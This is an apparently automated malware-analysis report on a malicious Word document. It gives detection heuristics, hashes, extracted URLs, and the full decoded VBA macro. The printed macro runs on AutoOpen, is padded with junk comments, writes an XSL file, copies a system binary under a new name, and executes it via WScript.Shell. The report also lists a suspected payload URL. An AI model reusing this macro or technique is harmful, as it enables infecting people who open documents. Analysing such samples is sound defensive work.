Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 d5cf07929dcec70a…

MALICIOUS

Office (OOXML)

96.9 KB Created: 2021-01-27 10:53:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2021-02-20
MD5: 3b11828f9b91c4f084c332c20cdbf2e7 SHA-1: 5e10dd3c1db565269a946e6f2b12f7b1b316989c SHA-256: d5cf07929dcec70aa230c4a44f26280ef4059d73a84a3127ed6afa550dc2ce5c
230 Risk Score

Heuristics 7

  • ClamAV: Doc.Downloader.8f0f0f0fe0f0f0f0-OOXML-9981534-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.8f0f0f0fe0f0f0f0-OOXML-9981534-0
  • VBA project inside OOXML medium 4 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
    CreateObject("wscript.shell").exec aqTf5d(aDdup, aa0eA)
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    CreateObject("wscript.shell").exec aqTf5d(aDdup, aa0eA)
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://ecreopen2.com/assets/c3a45b3b0/5/d780c7708397fafd12dbf/logqbag10?xjy=5308e8af8c98bc3&xi=f42d3bcc4c9e&swqm=ff38ee&lr=0cf014678c1&jnjz=25856af0e8eb318d&cwqjs=88604e1 In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvasIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2018/wordml/cexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2018/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
    • http://ns.adobe.com/xap/1.0/In document text (OOXML body / shared strings)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OOXML body / shared strings)
    • http://purl.org/dc/elements/1.1/In document text (OOXML body / shared strings)
    • http://ns.adobe.com/xap/1.0/mm/In document text (OOXML body / shared strings)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OOXML body / shared strings)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OOXML body / shared strings)
    • http://ns.adobe.com/photoshop/1.0/In document text (OOXML body / shared strings)
    • http://www.w3.org/1999/XSL/TransformIn document text (OOXML body / shared strings)
    • https://microsoft.com/xxxIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 5734 bytes
SHA-256: fed2120100bd232be8e67aa4da043b6ea45b8c867e233218aa1ffd09ee0c216f
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "frm"
Attribute VB_Base = "0{235DB590-4413-418B-80E9-C7B5228D7D69}{09536EF7-09B9-4351-BA9D-458A140AB611}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "ao3ubn"
Function aD63BN(aoMiv)
' Blanched james rosebud
' Animus adduce preside
' Simulate black popular marc
aD63BN = ActiveDocument.BuiltInDocumentProperties(aoMiv)
End Function
Sub AutoOpen()
' Rack decorative
' Dye calls metro empirical
aBHPfI
End Sub

Attribute VB_Name = "a0GZ9F"
Function aWrz9(a7aNM)
' Utrecht
' Assembling
' Polygamy volunteers
' Qualifications fault rap sahara nt pent-up
' Config abolishing distinct tank
' Acquisition
' Pigtail swivel islands savoy
' Capriciously periodically
' Scrip
' Dogged conflict award bedlam
' Gory host
' Sexual tenets
' Cards vhs posthumous engineers incidents
' Reconsider urine betty commercially engross warsaw
' Compulsion park godhead suddenly desecration
' Incontrovertible brewer sink finland
' Handmaiden convention absorption saracen
' Nearby downloaded
' Suzanne knee-deep absinthe azores languorous
' Bankrupt terry simulations thunder awkwardness
' Voice scythe
' Laundress panacea mariah sterling corrections
' Georgia presented voyuer recorder preaches internship ur
' Avow lizard
' Sip shoes telecommunications
' Update politicians
' Portugal leech homepage cycles andrea gun
' Abhors
' Ver agonised temperatures
' Clive pickle pater
' Watchman
' Notebook dividend played celebration
' Gratuity mae
' Derrick retract mentor pamela
' Notebook registry leaks
' Largest
' Outdoor mush crib
' Losing wallpaper mass
' Quire joins united threatened
' Sensitivity melee naming short pubmed
' Pro badge pique meager placed
' Camden samples indexed
' Synopsis yen freely wrote pedant
' Diabolic
' Experiencing java keno rational
' Monotone empirical
' Conserve scheduled
' Games archipelago able-bodied trident
' Tests encroach accumulate weave pocketbook
End Function
Function aqTf5d(aDdup, aa0eA)
' Openings
' Tunes gases
Dim agHu8 As String
agHu8 = Chr(34)
' Philippines toolbar attitude englishwoman cumbrous approval
' Strip putrid suffix
' Belief menu
aqTf5d = aDdup & aD63BN("comments") & agHu8 & aa0eA & agHu8
End Function
Sub aBHPfI()
' Tracking veldt theology harpsichord
' Anyone leaking kennel undergraduate
' Congo virginia sparc recruit dorsal
' Pleased ping
' Viking trick afire infusion
' Upgrade functionality
' Gs keyword strain postal extradition
' Perhaps indianapolis lying dregs
' Abolitionist
' Super stun jena handed
' Outspoken del generate beans
' Assisted chinese bombastic
' Scion
' Detection tries
' Ave also
' Sizes released damask courses
' Spoonfuls rambling rosary
' Liken easily
' Renewable twenty-sixth reef disappointing infect
' Sent. debasement tapers
' Designed
' Cronies greener fy
' Cassette subjective dane
aHjcI = frm.textbox1.text
' Accounting beehive composers
a0IZP = frm.textbox2.text
aZCIE = ""
aa0eA = a0IZP & "\h1.xsl"
aDdup = a0IZP & "\h1.com"
' Choice perishing
' Selling international suggests
ao9kdt = frm.textbox3.text
' Adventures configured dappled auctioneer
' Slug defendant mir
' Marlowe few principality annexation shred hesse
' Element upset
aTCD4 aa0eA, aHjcI
' Prince horny
' Impute
' Insecure int dilapidated
' Derogatory upload mario
' Griffith birthday
' Stored popularity columbus tillage
' Sinew tf mastercard
FileCopy ao9kdt, aDdup
' Genteel nissan tmp
' Doubt kabul
' Obliterate asn
' Relentless bidding
' Founded missouri var
' Domination beans scraggy cups tasmania
' Zodiac mode
' Faraday adams updating journalism platinum
' Patrician worldwide linden plastic
' Focal proceed atlanta tryst stable citysearch
CreateObject("wscript.shell").exec aqTf5d(aDdup, aa0eA)
' Spoke amazing
' Unsigned ext shewn bruise
' Roe arbor confronting coxcomb condensation
' Organisations pocket applications poly
' Framing bristol precipitated usgs diagonal yugoslavia rocks
' Beginner
' Buffoon exact bare
' Compensation capabilities
' Bog december
' Nebulous beat spleen groove
' Incorporated hit
' Dissipation infanticide
' Box piers spies deviation
' Groin heartache
' Encumber
' Hammer hi twinks reel mother out lard
' Emergency
' Faqs hat dedicated
' Barrister suites thu horn
' Laden adele dreams
' Objectively
' Reinforcement alienate
' Stolen babies pretension reporter
' Analyses apr scott
' Billing institutes
' Coin indiscriminate
' Possessive inauspicious
' Abhorred ganymede lax ahead
' Intermediate cure flippant vibrate
' Shepherd farmer
' Word gabble circus iso
End Sub
Sub aTCD4(aufo82, aHjcI)
' Closes
' Correcting soar
' Abigail puzzle ochre
' Twaddle lc casino
' Dowry mither potato gory
' Pus address tobago product rpg
' Dont wheedle pc uno
' Xanax engine steven dover
' Emblematic oxford
' Cathay yew jewellery unconcern flier
' Angelic tons
' Marvin algeria disabled flowery
' Hc spontaneously isolation infections
' Resentful mini
' Surplice roundabout
' Carrier
' Docile
' Provided mails veracity
Open aufo82 For Output As #1
Print #1, aHjcI
' Js vacations
' Pdas everything tabooed pyjamas shuffling
' Product highlighted ir reminder pair
Close #1
End Sub
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 32256 bytes
SHA-256: 53074664c40b3bc73af4082bd0376bac5668c551820c7704569ab8d7ed024f3a

Open this report in the interactive analyzer, or submit your own file for analysis.